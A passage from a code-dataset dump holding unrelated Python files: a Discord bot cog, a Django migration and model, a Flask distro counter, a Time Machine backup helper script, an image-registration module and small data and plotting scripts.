test_cases:\n split_string = list(multicache.split_string_into_parts(case[0], 3))\n self.assertEqual(split_string, case[1])\n\n\n #\n # Smoke Tests\n #\n def testInstance(self):\n \"\"\"adapt to your purposes, I like to always include this as a sanity check\"\"\"\n self.assertTrue(isinstance(self, AppswellUnitTest))\n\n\n#\n# Main\n#\nif __name__ == \"__main__\":\n 
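# [Illustrative sketch, not part of the original module] The split semantics
# pinned down by test_split_string_into_parts above are: chunks of
# len(s) // num_parts characters, with any remainder folded into the last
# chunk. One hedged way to realize that behaviour (the real implementation
# lives in framework.lib.multicache):
#
#     def split_string_into_parts(s, num_parts):
#         step = len(s) // num_parts
#         for i in range(num_parts):
#             yield s[i * step:] if i == num_parts - 1 else s[i * step:(i + 1) * step]
#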
run_test_from_command_line(MulticacheTest)\n","sub_path":"appspot/project/test/unit/test_multicache.py","file_name":"test_multicache.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"438013054","text":"import random\n\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands import Context\n\nfrom backend import database\n\n\nclass Fun(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.enabled = True\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_message(self, message: discord.Message):\n if not self.enabled:\n return\n if message.author.bot:\n return\n if not random.randint(0, 100) == 50:\n return\n await message.add_reaction(\"<:tutkegel:620927895132569601>\")\n\n @commands.command(hidden=True)\n async def toggle(self, ctx):\n self.enabled = not self.enabled\n await ctx.send(f\"Set enabled to: {self.enabled}\")\n\n # Send 3x3 emote grid with tutkegel.\n # Emotes are from Davvos11's test discord,\n # therefore, there isn't a need to waste emote space on the TCS discord\n @commands.command(name=\"tutkegel\")\n async def tutkegel(self, ctx):\n await ctx.send(\"<:tegel9:634119527680180261>\"\n \"<:tegel8:634119528158199841>\"\n \"<:tegel7:634119527927513089>\"\n \"\\n<:tegel6:634119527868661773>\"\n \"<:tegel5:634119527877050399>\"\n \"<:tegel4:634119528346812429>\"\n \"\\n<:tegel3:634119528825094164>\"\n \"<:tegel2:634119528330035200>\"\n \"<:tegel1:634119528439218206>\")\n\n # Send the leaderboards in the following format:\n # {ranking}. {name} - {positives} Positives and {negatives} Negatives\n @commands.command(name='wiezijnhetmooist',\n aliases=['whoarehetmooist', 'spiegeltjespiegeltjeaandewand'])\n async def on_karma_leaderboard_request(self, ctx: Context):\n message = '\\n'.join([f'{x[0] + 1}. 
{self.bot.get_user(x[1][0]).name} - '\n f'{x[1][1]} Positives and {x[1][2]} Negatives'\n for x in enumerate(await database.get_top_karma(10))])\n await ctx.send(message if message else 'Nobody is mooi')\n\n # Send a current status for a given player in the following format:\n # {mention} - You currently have {positives} Positives and {negatives} Negatives\n @commands.command(name='hoemooibenik', aliases=['howmooiami'])\n async def on_karma_self_request(self, ctx: Context):\n author: discord.User = ctx.author\n response: (int, int) = await database.get_karma(author.id)\n await ctx.send(f'{author.mention} - You currently have: {response[0]} '\n f'Positives and {response[1]} Negatives')\n\n @commands.Cog.listener()\n async def on_reaction_add(self, reaction: discord.Reaction, member: discord.Member):\n await self.change_count(reaction, member, True)\n\n @commands.Cog.listener()\n async def on_reaction_remove(self, reaction: discord.Reaction, member: discord.Member):\n await self.change_count(reaction, member, False)\n\n class KarmaEmotes(discord.Enum):\n POSITIVE = 'dasmooi'\n NEGATIVE = 'dasnietmooi'\n\n # Check if the karma count should be changed, if so, change it\n async def change_count(self, reaction: discord.Reaction, member: discord.Member,\n increment: bool):\n # Check if the user doesn't want to give karma to themselves.\n # It is also important that Tegel's opinion doesn't count.\n if self.enabled and member != reaction.message.author \\\n and not discord.utils.get(member.roles, name='Tegel'):\n emoji: discord.emoji.Emoji = reaction.emoji\n # Check if the emoji is a karma emoji\n if type(emoji) == discord.emoji.Emoji:\n if emoji.name == self.KarmaEmotes.POSITIVE.value:\n # Update the positive karma\n await database.update_karma(reaction.message.author.id,\n (1 if increment else -1, 0))\n elif emoji.name == self.KarmaEmotes.NEGATIVE.value:\n # Update the negative karma\n await database.update_karma(reaction.message.author.id,\n (0, 1 if increment else -1))\n\n # Replies \"Alexa, play Despacito\" to messages containing \"this is so sad\"\n @commands.Cog.listener()\n async def on_message(self, message: discord.Message):\n if not self.enabled:\n return\n if message.author.bot:\n return\n if not \"this is so sad\" in message.content.lower():\n return\n await message.channel.send(\"Alexa, play Despacito\")\n\ndef setup(bot):\n bot.add_cog(Fun(bot))\n","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"479954273","text":"\n\nfrom xai.brain.wordbase.nouns._fathead import _FATHEAD\n\n#calss header\nclass _FATHEADS(_FATHEAD, ):\n\tdef __init__(self,): \n\t\t_FATHEAD.__init__(self)\n\t\tself.name = \"FATHEADS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"fathead\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_fatheads.py","file_name":"_fatheads.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247037090","text":"# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Deleting field 'Currency.name'\n db.delete_column(u'currency_currency', 'name')\n\n # Adding field 'Currency.name_es'\n db.add_column(u'currency_currency', 'name_es',\n 
self.gf('django.db.models.fields.CharField')(default=None, max_length=50, null=True, blank=True),\n keep_default=False)\n\n # Adding field 'Currency.name_en'\n db.add_column(u'currency_currency', 'name_en',\n self.gf('django.db.models.fields.CharField')(default=None, max_length=50, null=True, blank=True),\n keep_default=False)\n\n # Adding unique constraint on 'Currency', fields ['code']\n db.create_unique(u'currency_currency', ['code'])\n\n\n def backwards(self, orm):\n # Removing unique constraint on 'Currency', fields ['code']\n db.delete_unique(u'currency_currency', ['code'])\n\n # Adding field 'Currency.name'\n db.add_column(u'currency_currency', 'name',\n self.gf('django.db.models.fields.CharField')(default=None, max_length=50),\n keep_default=False)\n\n # Deleting field 'Currency.name_es'\n db.delete_column(u'currency_currency', 'name_es')\n\n # Deleting field 'Currency.name_en'\n db.delete_column(u'currency_currency', 'name_en')\n\n\n models = {\n u'currency.currency': {\n 'Meta': {'object_name': 'Currency'},\n 'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '3'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'name_en': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '50', 'null': 'True', 'blank': 'True'}),\n 'name_es': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '50', 'null': 'True', 'blank': 'True'}),\n 'symbol': ('django.db.models.fields.CharField', [], {'max_length': '3'}),\n 'value': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'})\n }\n }\n\n complete_apps = ['currency']","sub_path":"poppurri/currency/migrations/0002_auto__del_field_currency_name__add_field_currency_name_es__add_field_c.py","file_name":"0002_auto__del_field_currency_name__add_field_currency_name_es__add_field_c.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"465458201","text":"#!/opt/homebrew/bin/python3\n# -*- coding: utf-8 -*-\n# Time Machine Traveler Helper\n# v1.0\n# Pavel Zhovner\n# zhovner\n# https://user-images.githubusercontent.com/774290/132701329-36b01255-50f4-4902-8ea3-0088edb38b2b.jpg\n# Helps run remote Time Machine. Test network speed to SMB server and start backup only if SMB server is speed enough.\n# python3,iperf3,osascript\n#\n#string(SMB_SHARE_ADDRESS=\"\"): Your SMB share address\n#string(WORKGROUP_NAME=\"\"): Your SMB share address\n#string(SMB_MOUNT_PATH=\"\"): Your SMB share address\n#string(SMB_USER=\"\"): Your SMB share address\n#string(SMB_SHARE_PATH=\"\"): Your SMB share address\n#string(SPEED_TEST_SERVER=\"\"): Your SMB share address\n#string(SPEED_TEST_DURATION=\"\"): Your SMB share address\n#string(SPEED_TEST_TIMEOUT=\"\"): Your SMB share address\n#string(MIN_SPEED=\"\"): Your SMB share address\n#string(MAX_LOAD_AVERAGE=\"\"): Your SMB share address\n\n\n### Requirements\n# brew install python3 iperf3\n# pip3 install osascript\n\n### How to use:\n# 1. Mount remote SMB share and save credentials in system keychain\n# 2. Configure Time Machine to SMB share in System Preferences. Make sure that first backup is created correctly\n# 3. Disable automatic backup in Time Machine\n# 4. 
Setup this script \n\nimport subprocess\nimport json\nimport glob \nimport os\nimport time\nimport sys\nimport datetime\n\n# If you still have this error after install osascript, try to set right python3 shell bang\ntry:\n    import osascript\nexcept ImportError:\n    # generate_output() is only defined further down, so it cannot be called\n    # from this import-time handler; print a plain xbar-style error instead.\n    print(\"⚠️\")\n    print(\"---\")\n    print(\"Can't import osascript module. Run: pip3 install osascript\")\n    sys.exit(0)\n\n\ndef generate_output(message, status):\n\n    if status == 'FATAL_ERROR':\n        print(\"⚠️\")\n        print(\"---\")\n        print(\"Time Machine Travel Helper | font=LucidaGrande-Bold\")\n        print(\"---\")\n        print(\"Fatal error:\")\n        print(message)\n\n    if status == 'IDLE':\n        print(\"🕒\")\n        print(\"---\")\n        print(\"Time Machine Travel Helper | font=LucidaGrande-Bold\")\n        # TODO: Show latest backup date\n        print(\"Last Run: \" + datetime.datetime.now().strftime(\"%d %b %Y - %H:%M\") + \" | size=10\")\n        print(\"---\")\n        print(message)\n        print(\"Skipping backup...\")\n\n    if status == 'RUN':\n        print(\"🌀\")\n        print(\"---\")\n        print(\"Time Machine Travel Helper | font=LucidaGrande-Bold\")\n        print(\"---\")\n        # TODO: Show backup status and progress\n        print(\"Backing up...\")\n\n    # Manually run button\n    print(\"---\")\n    print(\"Run now | refresh=true\")\n\n    # Trying to print some logs if we have some\n    try: \n        # Output log in dropdown menu\n        print(\"Logs\")\n        \n        # Current time machine path settings\n        print(\"-- Time Machine Settings:\")\n        for l in TMUTIL_SETTINGS.splitlines():\n            print(\"-- \" + l)\n\n        # SMB status\n\n        # Display upload speed\n        if UPLOAD_SPEED:\n            print(\"-- \")\n            print(\"-- Speed Test to: \" + SPEED_TEST_SERVER)\n            print(\"-- ====================================================\")\n            print(\"-- Upload Speed: \" + str(UPLOAD_SPEED) + \" Mbits/sec\")\n        \n        # List Time Machine bundles files\n        print(\"-- \")\n        print(\"-- Found \" + str(len(TIME_MACHINE_BACKUPS)) + \" Time Machine files:\")\n        print(\"-- ====================================================\")\n        for l in TIME_MACHINE_BACKUPS:\n            print(\"-- \" + str(l))\n    except:\n        pass\n\n    # Stop script after print logs\n    # we need to always exit with 0 because of xbar\n    exit(0)\n\n\n\n# Settings VARIABLES\n# ---------------------------------------------------------------\n\nSMB_SHARE_ADDRESS = os.environ[\"SMB_SHARE_ADDRESS\"]\nWORKGROUP_NAME = os.environ[\"WORKGROUP_NAME\"]\nSMB_MOUNT_PATH = os.environ[\"SMB_MOUNT_PATH\"]\nSMB_USER = os.environ[\"SMB_USER\"]\nSMB_SHARE_PATH = os.environ[\"SMB_SHARE_PATH\"]\n\nSPEED_TEST_SERVER = os.environ[\"SPEED_TEST_SERVER\"]\nSPEED_TEST_DURATION = os.environ[\"SPEED_TEST_DURATION\"]\nSPEED_TEST_TIMEOUT = os.environ[\"SPEED_TEST_TIMEOUT\"]\n\nMIN_SPEED = os.environ[\"MIN_SPEED\"]\nMAX_LOAD_AVERAGE = int(os.environ[\"MAX_LOAD_AVERAGE\"])\n\n# ---------------------------------------------------------------\n\n\n#### Script exit status to draw correct icon\nSTATUS = \"\"\n\n#### Print Time Machine settings\nTMUTIL_SETTINGS_SUB = subprocess.run([\"tmutil\", \"destinationinfo\"], capture_output=True)\nTMUTIL_SETTINGS = (str(TMUTIL_SETTINGS_SUB.stdout, 'utf-8'))\n# Stop if Time Machine not configured\nif \"No destinations configured\" in TMUTIL_SETTINGS:\n    generate_output(\"Time Machine not configured\",status='FATAL_ERROR')\n\n\n#### Check Load Average. 
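# [Illustrative aside, not part of the original script] os.getloadavg() returns
# the 1-, 5- and 15-minute load averages as a 3-tuple; only the 1-minute figure
# is used below. With a hypothetical threshold of 4:
#
#     one_min, five_min, fifteen_min = os.getloadavg()
#     if round(one_min) > 4:
#         print("system busy, skipping backup")
#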
Exit if system busy\nLA = round(os.getloadavg()[0])\nif LA > MAX_LOAD_AVERAGE:\n generate_output(\"System load is to high.\",status='IDLE')\n\n\n#### Check if Time Machine running\n# exit if backup running\n#\n# TODO: Display running progress\n#\n# Use python tmutil function if need more info from running time machine process\n# https://gist.github.com/andrewbenson/cc5fd79ff6999f0524b8979fe17937a3\n#\nTMUTIL_PHASE_SUB = subprocess.run([\"tmutil\", \"currentphase\"], capture_output=True)\nTMUTIL_PHASE = str(TMUTIL_PHASE_SUB.stdout, 'utf-8').strip()\nif TMUTIL_PHASE != \"BackupNotRunning\":\n generate_output(\"Backup is running...\",status='RUN')\n\n\n#### Check if SMB share availible \nSMBUTIL_SUB = subprocess.run([\"smbutil\", \"status\", SMB_SHARE_ADDRESS], capture_output=True)\nSMB_CHECK_RESULT = str(SMBUTIL_SUB.stdout, 'utf-8').strip()\n\n# Check if SMB share connect have workgoup name\n# Oterwise stop because SMB share not reacheble\nif WORKGROUP_NAME not in SMB_CHECK_RESULT:\n generate_output(\"SMB \" + SMB_SHARE_ADDRESS + \" not availible.\",status='IDLE')\n\n\n#### Run Network Speed Test\n# ---------------------------------------------------------------\ntry:\n IPERF_SUB = subprocess.run(\n [\"/opt/homebrew/bin/iperf3\",\n \"--connect-timeout\", SPEED_TEST_TIMEOUT, # Drop connection in laggy network\n \"--time\", SPEED_TEST_DURATION, # Run speed test shorter then default 10 seconds\n \"--json\", # Output in JSON format\n \"--client\", SPEED_TEST_SERVER], # Connects to Speed Test server in client mode\n capture_output=True)\nexcept:\n generate_output(\"iperf3 failed to run\",status='FATAL_ERROR')\n\n# Convert iperf3 output to valid JSON\nIPERF_RESULT = str(IPERF_SUB.stdout, 'utf-8') # Convert bytes to string\nIPERF_JSON = json.loads(IPERF_RESULT)\n# Exit if error key found \nif \"error\" in IPERF_JSON:\n generate_output(\"iperf3: \" + IPERF_JSON[\"error\"],status='FATAL_ERROR')\n\n# Else calculate the upload speed and decide if it's enough to start Time Machine\nelse:\n USPEED_FLOAT = IPERF_JSON[\"end\"][\"sum_sent\"][\"bits_per_second\"]\n UPLOAD_SPEED = round(USPEED_FLOAT) // 1000000\n if int(UPLOAD_SPEED) < int(MIN_SPEED):\n generate_output(\"Internet is too slow: \" + str(UPLOAD_SPEED) + \" Mbits/sec\\n\" + \"Minimum is: \" + str(MIN_SPEED) + \" Mbits/sec\",status='IDLE') \n\n\n#### Mounting SMB share if not mounted. Using osascript (hardest part)\nif not os.path.isdir(SMB_MOUNT_PATH):\n #print(SMB_MOUNT_PATH + \" not founded. 
Trying to mount...\")\n OSA_ARGS = 'tell application \"Finder\" to mount volume ' + '\"smb://' + SMB_USER + '@' + SMB_SHARE_ADDRESS + '/' + SMB_SHARE_PATH + '\"'\n osacode,osaout,osaerr = osascript.run(OSA_ARGS)\n #time.sleep(1)\n\n# Looking for a SMB Path again after mount \nif not os.path.isdir(SMB_MOUNT_PATH):\n generate_output(\"Mount \" + SMB_MOUNT_PATH + \" Failed\",status='FATAL_ERROR')\n #print(\"Command used to mount via osascript: \" + str(OSA_ARGS))\n\n\n#### Looking for *.sparsebundle files on SMB share\n# exit if not founded\n# Create Time Machine backup manually before using this script\nTIME_MACHINE_BACKUPS = glob.glob(SMB_MOUNT_PATH + \"/*.sparsebundle\")\nif not TIME_MACHINE_BACKUPS:\n print_error(\"Time Machine files not found on SMB share.\\n Run Time Machine first time manually before using this script\")\n\n#### Run Time Machine backup\nTIME_MACHINE_SUB = subprocess.run(\n [\"tmutil\",\n \"startbackup\"],\n capture_output=True)\n\nif TIME_MACHINE_SUB.returncode != 0:\n #print(\"ERROR: Time Machine Starting Failed!\")\n #osacode,osaout,osaerr = osascript.run('display notification \"⚠️ ERROR: Time Machine Starting Failed!\" with Title \"Time Machine Helper\"')\n print_error('Time Machine start failed\\n run: \"tmutil startbackup\" in terminal')\n\n### Check if Time Machine really starts backup\nTMUTIL_PHASE_SUB = subprocess.run([\"tmutil\", \"currentphase\"], capture_output=True)\nTMUTIL_PHASE = str(TMUTIL_PHASE_SUB.stdout, 'utf-8').strip()\nif 'BackupNotRunning' in TMUTIL_PHASE:\n generate_output('Time Machine not started\\n Run manually: \\\"tmutil startbackup\\\" in terminal',status='FATAL_ERROR')\n\n# Generate output\n# ---------------------------------------------------------------\n\ngenerate_output(\"\",status='RUN')","sub_path":"Network/time_machine_traveler.py","file_name":"time_machine_traveler.py","file_ext":"py","file_size_in_byte":9260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"265037975","text":"def summ(x,y,z):\n\tif x == y and y == z:\n\t\tprint (\"All munbers is equal, and summ multiplied by 3 is: \", (x+y+z)*3)\n\telse:\n\t\tprint (\"The summ of three numbers: \", x+y+z )\n\n\nsumm(1,2,3)\nsumm(4,4,4)\nsumm(5,5,6)\n\n\n\n\ndef sum_thrice(x, y, z):\n\n sum = x + y + z\n \n if x == y == z:\n sum = sum * 3\n return sum\n\nprint(sum_thrice(1, 2, 3))\nprint(sum_thrice(3, 3, 3))\n","sub_path":"18_calculating_sum.py","file_name":"18_calculating_sum.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"635751706","text":"from django.db import models\n\nfrom uuidfield import UUIDField\n\n\nclass Room(models.Model):\n\tid = UUIDField(\n\t\tprimary_key=True,\n\t\tauto=True\n\t)\n\troom_name = models.CharField(\n\t\tmax_length=200,\n\t\tblank=False,\n\t\tnull=False,\n\t)","sub_path":"rooms/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"119557515","text":"#!/usr/bin/env python3\nfrom flask import Flask, json, render_template\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\ndistro_list = {}\ntry:\n f = open(\"semester.txt\", \"r\")\n sem = \"the \" + f.read() + \" \"\n f.close()\nexcept:\n sem = \"\"\n\n\ndef load():\n global distro_list\n try:\n file = open('saved.json', 'r')\n distro_list = json.loads(file.read())\n print('loaded: '+str(distro_list))\n except: \n 
print('No saved distro list detected; a new one will be created on insert.')\n return 'data loaded';\n\ndef save():\n global distro_list\n tosave = json.dumps(distro_list);\n file = open('saved.json', 'w')\n file.write(tosave)\n file.close()\n return 'data saved';\n\n@app.route('/api/v1/add/', methods=['POST', 'GET'])\ndef add_distro(distro):\n global distro_list\n # add distro to distro_list\n if distro in distro_list:\n distro_list[distro] = distro_list[distro]+1;\n else:\n distro_list[distro] = 1;\n #socketio.emit('remote_distro_change', {distro: distro_list[distro]}, namespace='/distroupdates')\n save()\n return ''\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route('/api/v1/term')\ndef term():\n global sem\n return sem\n\n@app.route('/api/v1/distrolist')\ndef getDistrolist():\n global distro_list\n print('distrolist request: '+str(distro_list))\n distros = DistroList(distro_list);\n return json.dumps(distros.__dict__);\n\nclass DistroList:\n def __init__(self, distdict):\n self.distros = distdict\n\nload()\nprint('script started')\n\n\nif __name__ == '__main__':\n Flask.run(app)\n","sub_path":"sczi/installfest-counter/installfest-serve.py","file_name":"installfest-serve.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"412314183","text":"'''\n'''\n\n\nimport os\n\nimport nornir_imageregistration\nimport nornir_imageregistration.files.stosfile\nfrom scipy import pi\n\nimport numpy as np\n\n\nclass AlignmentRecord:\n '''\n Records basic registration information as an angle and offset between a fixed and moving image\n If the offset is zero the center of both images occupy the same point. \n The offset determines the translation of the moving image over the fixed image.\n There is no support for scale, and there should not be unless added as another variable to the alignment record\n \n :param array peak: Translation vector for moving image\n :param float weight: The strength of the alignment\n :param float angle: Angle to rotate moving image in degrees\n \n '''\n\n @property\n def angle(self):\n '''Rotation in degrees'''\n return self._angle\n\n @property\n def rangle(self):\n '''Rotation in radians'''\n return self._angle * (pi / 180.0)\n\n @property\n def weight(self):\n '''Quantifies the quality of the alignment'''\n return self._weight\n \n @weight.setter\n def weight(self, value):\n self._weight = value\n\n @property\n def peak(self):\n '''Translation vector for the alignment'''\n return self._peak\n\n def WeightKey(self):\n return self._weight\n\n def scale(self, value):\n '''Scales the peak position'''\n self._peak = self._peak * value\n\n def translate(self, value):\n '''Translates the peak position using tuple (Y,X)'''\n self._peak = self._peak + value\n\n def Invert(self):\n '''\n Returns a new alignment record with the coordinates of the peak reversed\n Used to change the frame of reference of the alignment from one tile to another\n '''\n return AlignmentRecord((-self.peak[0], -self.peak[1]), self.weight, self.angle)\n\n def __str__(self):\n s = 'angle: ' + str(self._angle) + ' offset: ' + str(self._peak) + ' weight: ' + str(self._weight)\n return s\n\n def __init__(self, peak, weight, angle=0.0):\n if not isinstance(angle, float):\n angle = float(angle)\n\n self._angle = angle\n\n if not isinstance(peak, np.ndarray):\n peak = np.array(peak)\n\n self._peak = peak\n self._weight = weight\n\n def CorrectPeakForOriginalImageSize(self, 
FixedImageShape, MovingImageShape):\n\n if self.peak is None:\n self.peak = (0, 0)\n\n return nornir_imageregistration.transforms.factory.__CorrectOffsetForMismatchedImageSizes(FixedImageShape, MovingImageShape)\n\n\n def GetTransformedCornerPoints(self, warpedImageSize):\n '''\n \n '''\n return nornir_imageregistration.transforms.factory.GetTransformedRigidCornerPoints(warpedImageSize, self.rangle, self.peak)\n\n\n def ToTransform(self, fixedImageSize, warpedImageSize=None):\n '''\n :param (Height, Width) fixedImageSize: Size of translated image in fixed space\n :param (Height, Width) warpedImageSize: Size of translated image in warped space. If unspecified defaults to fixedImageSize\n :return: A rigid rotation+translation transform described by the alignment record\n '''\n\n if warpedImageSize is None:\n warpedImageSize = fixedImageSize\n\n return nornir_imageregistration.transforms.factory.CreateRigidTransform(fixedImageSize, warpedImageSize, self.rangle, self.peak)\n\n def __ToGridTransformString(self, fixedImageSize, warpedImageSize):\n\n transform = self.ToTransform(fixedImageSize, warpedImageSize)\n\n warpedSpaceCorners = nornir_imageregistration.transforms.factory.GetTransformedRigidCornerPoints(warpedImageSize, rangle=0, offset=(0, 0))\n\n fixedSpaceCorners = transform.Transform(warpedSpaceCorners)\n\n# list = [str(BotLeft.item(0)),\n# str(BotLeft.item(1)),\n# str(BotRight.item(0)),\n# str(BotRight.item(1)),\n# str(TopLeft.item(0)),\n# str(TopLeft.item(1)),\n# str(TopRight.item(0)),\n# str(TopRight.item(1))]\n\n string = \"\"\n\n fixedSpaceCorners = np.fliplr(fixedSpaceCorners)\n\n for s in fixedSpaceCorners.flat:\n string = string + ' %g' % s\n\n return string\n\n def ToStos(self, ImagePath, WarpedImagePath, FixedImageMaskPath=None, WarpedImageMaskPath=None, PixelSpacing=1):\n stos = nornir_imageregistration.files.stosfile.StosFile()\n stos.ControlImageName = os.path.basename(ImagePath)\n stos.ControlImagePath = os.path.dirname(ImagePath)\n\n stos.MappedImageName = os.path.basename(WarpedImagePath)\n stos.MappedImagePath = os.path.dirname(WarpedImagePath)\n\n if not FixedImageMaskPath is None:\n stos.ControlMaskName = os.path.basename(FixedImageMaskPath)\n stos.ControlMaskPath = os.path.dirname(FixedImageMaskPath)\n\n if not WarpedImageMaskPath is None:\n stos.MappedMaskName = os.path.basename(WarpedImageMaskPath)\n stos.MappedMaskPath = os.path.dirname(WarpedImageMaskPath)\n\n (ControlHeight, ControlWidth) = nornir_imageregistration.core.GetImageSize(ImagePath)\n stos.ControlImageDim = (ControlWidth, ControlHeight)\n\n (MappedHeight, MappedWidth) = nornir_imageregistration.core.GetImageSize(WarpedImagePath)\n stos.MappedImageDim = (MappedWidth, MappedHeight)\n\n # transformTemplate = \"FixedCenterOfRotationAffineTransform_double_2_2 vp 8 %(cos)g %(negsin)g %(sin)g %(cos)g %(x)g %(y)g 1 1 fp 2 %(mapwidth)d %(mapheight)d\"\n\n # stos.Transform = transformTemplate % {'cos' : cos(Match.angle * numpy.pi / 180),\n # 'sin' : sin(Match.angle * numpy.pi / 180),\n # 'negsin' : -sin(Match.angle * numpy.pi / 180),\n # 'x' : Match.peak[0],\n # 'y' : -Match.peak[1],\n # 'mapwidth' : stos.MappedImageDim[0]/2,\n # 'mapheight' : stos.MappedImageDim[1]/2}\n\n transformTemplate = \"GridTransform_double_2_2 vp 8 %(coordString)s fp 7 0 1 1 0 0 %(width)f %(height)f\"\n\n # We use Y,X ordering in memory due to Numpy. 
Ir-Tools coordinates are written X,Y.\n coordString = self.__ToGridTransformString((stos.ControlImageDim[1], stos.ControlImageDim[0]), (stos.MappedImageDim[1], stos.MappedImageDim[0]))\n\n stos.Transform = transformTemplate % {'coordString' : coordString,\n 'width' : stos.MappedImageDim[0] - 1,\n 'height' : stos.MappedImageDim[1] - 1}\n\n stos.Downsample = PixelSpacing\n\n# print \"Done!\"\n\n return stos\n","sub_path":"nornir_imageregistration/alignment_record.py","file_name":"alignment_record.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"223900980","text":"\n\nfrom xai.brain.wordbase.verbs._debilitate import _DEBILITATE\n\n#calss header\nclass _DEBILITATING(_DEBILITATE, ):\n\tdef __init__(self,): \n\t\t_DEBILITATE.__init__(self)\n\t\tself.name = \"DEBILITATING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"debilitate\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_debilitating.py","file_name":"_debilitating.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"643469627","text":"import os\nimport random\nimport pandas as pd\nimport numpy as np\nimport cv2\nimport math\nfrom pathlib import Path\n\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n\ndata = pd.read_csv('driving_log.csv', index_col = False)\ndata.columns = ['centerImage', 'leftImage', 'rightImage', 'steering', 'throttle', 'brake', 'speed']\n\ndata1 = pd.read_csv('driving_log1.csv', index_col = False)\ndata1.columns = ['centerImage', 'leftImage', 'rightImage', 'steering', 'throttle', 'brake', 'speed']\n\nframes = [data, data1]\nfinalData = pd.concat(frames)\n\nvalid_data, train_data = np.split(finalData.sample(frac = 1), [int(len(data) * 0.2)])\n\ndel data\nprint(\"The Validation Data Shape\", valid_data.shape)\nprint(\"The training data shape \", train_data.shape)\n\n\ndef modifyBrightness(image):\n \"\"\"\n This functions increases the brightness. i.e It increases the contrast of the image.\n \"\"\"\n image = cv2.cvtColor(image,cv2.COLOR_RGB2HSV)\n brightness = 0.4 + np.random.uniform()\n image[:,:,2] = image[:,:,2]* brightness\n\n return cv2.cvtColor(image,cv2.COLOR_HSV2RGB)\n\nfig = plt.figure(figsize=(60, 80))\ngs = gridspec.GridSpec(3, 3)\n\ndef translateImage(image, angle = 0):\n \"\"\"\n This function translates the Images in different directions randomly.\n \"\"\"\n x = (80 * np.random.uniform()) - (80 * 0.5)\n y = (30 * np.random.uniform()) - (30 * 0.5)\n M = np.float32([[1,0,x],[0,1,y]])\n rows,cols,channels = image.shape\n image = cv2.warpAffine(image,M,(cols,rows))\n new_angle = angle + ((x/80)*2)*0.3\n\n return image, new_angle\n\ndef getCroppedAndResizedImage(image):\n \"\"\"\n This function crops the image such in order to remove the features in the SKY and shows only the road. 
It also resizes the image so it can be fed to the VGG model.\n \"\"\"\n image = image[50:145,:,:]\n image = cv2.resize(image,(64,64),interpolation=cv2.INTER_AREA)\n image = np.array(image)\n\n return image\n\n\ni = 0\nfor g in gs:\n ax = fig.add_subplot(g)\n index = np.random.randint(len(train_data))\n temp = train_data.centerImage.iloc[index].strip()\n image = mpimg.imread(temp)\n image = getCroppedAndResizedImage(image)\n ax.set_title('Steering angle: %s - Data ' % (train_data.steering.iloc[index]) ,fontsize=10)\n ax.imshow(image)\n i = i + 1\ngs.tight_layout(fig)\nplt.show()\n","sub_path":"showImage.py","file_name":"showImage.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"611677669","text":"from bs4 import BeautifulSoup\nfrom wordcloud import WordCloud, STOPWORDS\nimport numpy as np\nfrom PIL import Image\nimport identify_xml\n\ndef verifyXML(XMLName):\n if '.xml' in XMLName:\n return 1\n else:\n return \"not an XML file\"\n\ndef openXML(xmlName):\n if verifyXML(xmlName) == 1:\n with open(xmlName, 'r') as f:\n data = f.read()\n return data\n\ndef createWordcloud(cloudText, i):\n #FOR THE WORDCLOUD OF EACH PAPER\n\n #frequent words that don't need to be included\n stopwords = STOPWORDS\n stopwords.add(\"et\")\n stopwords.add(\"al\")\n #image for the cloud shape\n mask = np.array(Image.open(\"cloud_image.webp\"))\n\n #object for the wordcloud\n wc = WordCloud(background_color='white',stopwords=stopwords,height = 600,width=400, mask=mask)\n\n #generating the wordcloud\n wc.generate(cloudText)\n\n #creating an image of the wordcloud\n wc.to_file('./output_files/wordcloud_paper' + i + '.png')\n\n\nconcat = \"\"\ndata = 